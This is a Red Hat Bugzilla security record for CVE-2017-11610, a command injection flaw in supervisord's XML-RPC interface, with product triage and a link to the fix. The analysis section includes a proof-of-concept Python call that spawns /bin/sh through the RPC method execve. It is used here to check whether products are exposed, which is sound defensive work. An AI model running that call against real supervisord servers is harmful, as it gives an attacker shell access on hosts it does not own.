Bug 1476143 (CVE-2017-11610)
Summary: | CVE-2017-11610 supervisor: Command injection via malicious XML-RPC request | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Andrej Nemec <anemec> |
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
Status: | CLOSED ERRATA | QA Contact: | |
Severity: | medium | Docs Contact: | |
Priority: | medium | ||
Version: | unspecified | CC: | agrimm, avibelli, cpelland, dajohnso, drusso, gblomqui, gmccullo, gtanzill, hhudgeon, jal233, jbalunas, jfrey, jhardy, jmrazek, jprause, jshepherd, kevin, obarenbo, roliveri, rrajasek, simaishi, sisharma, tkirby, troxor0, tsao |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | supervisor 3.3.3 | Doc Type: | If docs needed, set a value |
Doc Text: |
A vulnerability was found in the XML-RPC interface in supervisord. When processing malformed commands, an attacker can cause arbitrary shell commands to be executed on the server as the same user as supervisord. Exploitation requires the attacker to first be authenticated to the supervisord service.
|
Story Points: | --- |
Clone Of: | Environment: | ||
Last Closed: | 2019-06-08 03:19:10 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | 1476144, 1476145, 1476286, 1476287, 1476355, 1476356, 1477924 | ||
Bug Blocks: | 1476147 |
Description
Andrej Nemec
2017-07-28 06:57:02 UTC
Created supervisor tracking bugs for this issue: Affects: epel-all [bug 1476145] Affects: fedora-all [bug 1476144] Analysis: Default install on Red Hat Ceph Storage does not run any service on port 9001 and does not accept connection. ~]$ python2 Python 2.7.5 (default, Aug 2 2016, 04:20:16) [GCC 4.8.5 20150623 (Red Hat 4.8.5-4)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> from xmlrpclib import ServerProxy >>> from supervisor.xmlrpc import SupervisorTransport >>> server = ServerProxy('http://127.0.0.1/RPC2', SupervisorTransport('', '', 'unix:///var/tmp/supervisord.sock')) >>> server.supervisor.supervisord.options.execve('/bin/sh', [], {}) Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__ return self.__send(self.__name, args) File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request verbose=self.__verbose File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request self.connection.request('POST', handler, request_body, self.headers) File "/usr/lib64/python2.7/httplib.py", line 1017, in request self._send_request(method, url, body, headers) File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request self.endheaders(body) File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders self._send_output(message_body) File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output self.send(msg) File "/usr/lib64/python2.7/httplib.py", line 826, in send self.connect() File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect self.sock.connect(self.socketfile) File "/usr/lib64/python2.7/socket.py", line 224, in meth return getattr(self._sock,name)(*args) socket.error: [Errno 2] No such file or directory supervisor package is used by calamari which uses following configuration in default install ~]# vi /etc/supervisor/conf.d/calamari.conf [supervisord] loglevel=warn logfile=/var/log/calamari/supervisord.log childlogdir=/var/log/calamari [program:carbon-cache] command=/opt/calamari/venv/bin/carbon-cache.py --debug --config /etc/graphite/carbon.conf start [program:cthulhu] command=/opt/calamari/venv/bin/cthulhu-manager stderr_logfile = /var/log/calamari/cthulhu_stderr.log stdout_logfile = /var/log/calamari/cthulhu_stdout.log http server is not enabled ~]# vi /etc/supervisord.conf ;[inet_http_server] ; inet (TCP) server disabled by default ;port=127.0.0.1:9001 ; (ip_address:port specifier, *:port for all iface) 1. If server is enabled is enabled (manually enabling server) INFO RPC interface 'supervisor' initialized CRIT Server 'inet_http_server' running without any HTTP authentication checking INFO supervisord started with pid 23888 TRAC XML-RPC method called: supervisor.supervisord.options.execve() 2. with unix domain socket: >>> from xmlrpclib import ServerProxy >>> from supervisor.xmlrpc import SupervisorTransport >>> server = ServerProxy('http://127.0.0.1/RPC2',SupervisorTransport('', '', 'unix:///tmp/supervisord.sock')) >>> server.supervisor.supervisord.options.execve('/bin/sh', [], {}) Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__ return self.__send(self.__name, args) File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request verbose=self.__verbose File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request self.connection.request('POST', handler, request_body, self.headers) File "/usr/lib64/python2.7/httplib.py", line 1017, in request self._send_request(method, url, body, headers) File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request self.endheaders(body) File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders self._send_output(message_body) File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output self.send(msg) File "/usr/lib64/python2.7/httplib.py", line 826, in send self.connect() File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect self.sock.connect(self.socketfile) File "/usr/lib64/python2.7/socket.py", line 224, in meth return getattr(self._sock,name)(*args) socket.error: [Errno 13] Permission denied Supervisor is used by the Nagios componet of RHMAP. In the supervisor configuration the XMLRPC plugin is not enabled. Also the Nagios images only exposes port 8080 (httpd), not (9001) XMLRPC network port. Marking RHMAP as not affected. Updated CVSSv3 score to reflect the fact that while several products use this component they do not expose he supervisor service to the network by default. Downgrading to medium because of this and the fact that these products also do not have local untrusted user accounts. This issue has been addressed in the following products: CloudForms Management Engine 5.8 Via RHSA-2017:3005 https://access.redhat.com/errata/RHSA-2017:3005 |